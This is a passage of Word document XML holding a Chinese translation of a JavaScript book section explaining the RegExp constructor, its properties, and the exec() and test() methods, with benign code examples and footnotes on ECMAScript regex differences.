        <w:t>对象。第一个参数包含正则表达式的主体部分，也就是正则表达式直接量中两条斜线之间的文本。需要注意的是，不论是字符串直接量还是正则表达式，都使用</w:t>
      </w:r>
      <w:r>
        <w:t>“\”</w:t>
      </w:r>
      <w:r>
        <w:t>字符作为转义字符的前缀，因此当给</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个字符串表述的正则表达式时，必须将</w:t>
      </w:r>
      <w:r>
        <w:t>“\”</w:t>
      </w:r>
      <w:r>
        <w:t>替换成</w:t>
      </w:r>
      <w:r>
        <w:t>“\\”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>egExp()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数是可选的，如果提供第二个参数，它就指定正则表达式的修饰符。不过只能传入修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>或者它们的组合。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>全局匹配字符串中的</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个数字，注意这里使用了</w:t>
      </w:r>
      <w:r>
        <w:t>"\\"</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"\"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var zipcode=new RegExp("\\d{5}","g");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数非常有用，特别是在需要动态创建正则表达式的时候，这种情况往往没办法通过写死在代码中的正则表达式直</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接量来实现。例如，如果待检索的字符串是由用户输入的，就必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，在程序运行时创建正则表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="10_3_1_RegExpDe_Shu_Xing_"/>
      <w:r>
        <w:t>10.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象都包含</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个属性。属性</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>是一个只读的字符串，包含正则表达式的文本。属性</w:t>
      </w:r>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:t>是一个只读的布尔值，用以说明这个正则表达式是否带有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>。属性</w:t>
      </w:r>
      <w:r>
        <w:t>ignoreCase</w:t>
      </w:r>
      <w:r>
        <w:t>也是一个只读的布尔值，用以说明正则表达式</w:t>
      </w:r>
      <w:r>
        <w:t>是否带有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>。属性</w:t>
      </w:r>
      <w:r>
        <w:t>multiline</w:t>
      </w:r>
      <w:r>
        <w:t>是一个只读的布尔值，用以说明正则表达式是否带有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>。最后一个属性</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>，它是一个可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的整数。如果匹配模式带有</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>修饰符，这个属性存储在整个字符串中下一次检索的开始位置，这个属性会被</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用到，下面会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="10_3_2_RegExpDe_Fang_Fa_"/>
      <w:r>
        <w:t>10.3.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>的方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了两个用于执行模式匹配操作的方法。它们的行为和上文介绍过的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法很类似。</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>最主要的执行模式匹配的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>，它与</w:t>
      </w:r>
      <w:r>
        <w:t>10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过的</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>相似，只是</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数是一个字符串，而</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法的参数是一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法对一个指定的字符串执行一个正则表达式，简言之，就是在一个字符串中执行匹配检索。如果它没有找</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>到任何匹配，它就返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，但如果它找到了一个匹配，它将返回一个数组，就像</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>方法为非全局检索返回的数组一样。这个数组的第一个元素包含的是与正则表达式相匹配的字符串，余下的元素是与圆括号内的子表达式相匹配的子串。属性</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>包含了发生匹配的字符位置，属性</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>引用的是正在检索</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>方法不同，不管正则表达式是否具有全局修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>都会返回一样的数组。回忆一下，当</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>的参数是一个全局正则表达式时，它返回由匹配结果组成的数组。相比之下，</w:t>
      </w:r>
      <w:r>
        <w:t>e xe c()</w:t>
      </w:r>
      <w:r>
        <w:t>总是返回一个匹配结果，并提供关于本次匹配的完整信息。当调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式对象具有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>时，它将把当前正则表达式对象的</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为紧挨着匹配子串的字符位置。当同一个正则表达式第二次调用</w:t>
      </w:r>
      <w:r>
        <w:t>exe c()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它将从</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性所指示的字符处开始检索。如果</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>没有发现任何匹配结果，它会将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>重置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（在任何时候都可以将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，每当在字符串中找最后一个匹配项后，在使用这个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象开始新的字符串查找之前，都应当将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>）。这种特殊的行为使我们可以在用正则表达式匹配字符串的过程中反复调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=/Java/g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var text="JavaScript is more fun than Java!";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var result;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while((result=patte</w:t>
      </w:r>
      <w:r>
        <w:t>rn.exec(text))!=null){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Matched'"+result[0]+"'"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"at position"+result.index+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>";next search begins at"+pattern.lastIndex);</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另外一个</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>方法是</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>，它比</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>更简单一些。它的参数是一个字符串，用</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>对某个字符串进行检测，如果包含正则表达式的一个匹配结果，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=/java/i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pattern.test("JavaScript");//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>和调用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>等价，当</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回结果不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。由于这种等价性，当一个全局正则表达式调用方法</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>时，它的行为和</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>相同，因为它从</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>指定的位置处开始检索某个字符串，如果它找到了一个匹配结果，那么它就立即设置</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>为当前匹配子串的结束位置。这样一来，就可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>来遍历字符串，就像用</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>search()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>replace()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>match()</w:t>
      </w:r>
      <w:r>
        <w:t>并不会用到</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>地将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性值重置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。如果让一个带有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式对多个字符串执行</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>test()</w:t>
      </w:r>
      <w:r>
        <w:t>，要么在每个字符串中找出所有的匹配以便将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>自动重置为零，要么显式将</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>手动设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（当最后一次检索失败时需要手动设置</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果忘了手动设置</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>的值，那么下一次对新字符串进行检索时，执行检索的起始</w:t>
      </w:r>
      <w:r>
        <w:t>位置可能就不是字符串的开始位置，而可能是任意位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。当然，如果</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>不带有修饰符</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>，则不必担心会发生这种情况。同样要记住，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，正则表达式直接量的每次计算都会创建一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，每个新</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有各自的</w:t>
      </w:r>
      <w:r>
        <w:t>lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这势必会大大减少</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>残留</w:t>
      </w:r>
      <w:r>
        <w:t>”lastIndex</w:t>
      </w:r>
      <w:r>
        <w:t>对程序造成的意外影响。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>有一些</w:t>
      </w:r>
      <w:r>
        <w:t>Perl</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式语法特性并不被</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>支持，这些特性包括：</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>（单行模式）和</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>（扩展语法）标记；</w:t>
      </w:r>
      <w:r>
        <w:t>\a</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\e</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\l</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\u</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\L</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\U</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\E</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\Q</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\A</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\Z</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>\z</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>\G</w:t>
      </w:r>
      <w:r>
        <w:t>转义字符；</w:t>
      </w:r>
      <w:r>
        <w:t>“(?</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=”</w:t>
      </w:r>
      <w:r>
        <w:t>正向后行断言和</w:t>
      </w:r>
      <w:r>
        <w:t>“(?</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!”</w:t>
      </w:r>
      <w:r>
        <w:t>负向后行断言；</w:t>
      </w:r>
      <w:r>
        <w:t>“(?#”</w:t>
      </w:r>
      <w:r>
        <w:t>注释和扩展</w:t>
      </w:r>
      <w:r>
        <w:t>“(?”</w:t>
      </w:r>
      <w:r>
        <w:t>的语法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>作者在这里揭示了一种非常容易忽略的情况，比如，这段代码在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.6</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4+</w:t>
      </w:r>
      <w:r>
        <w:t>中的运行结果不一致：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function getRE(){ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var re=/[a-z]/; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">re.foo="bar"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return re; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var reg=getRE(), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">re2=getRE(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(reg===re2);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.6</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4+</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">false </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">reg.foo="baz"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(re2.foo);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 3.6</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t>"baz"</w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4+</w:t>
      </w:r>
      <w:r>
        <w:t>中返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"bar" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:t>原因可以在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>规范第</w:t>
      </w:r>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:t>页和第</w:t>
      </w:r>
      <w:r>
        <w:t>247</w:t>
      </w:r>
      <w:r>
        <w:t>页找到，也就是说在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>规范中，用正则表达式创建的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象会共享同一个实例，而在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中则是两个独立的实例。而最新的</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
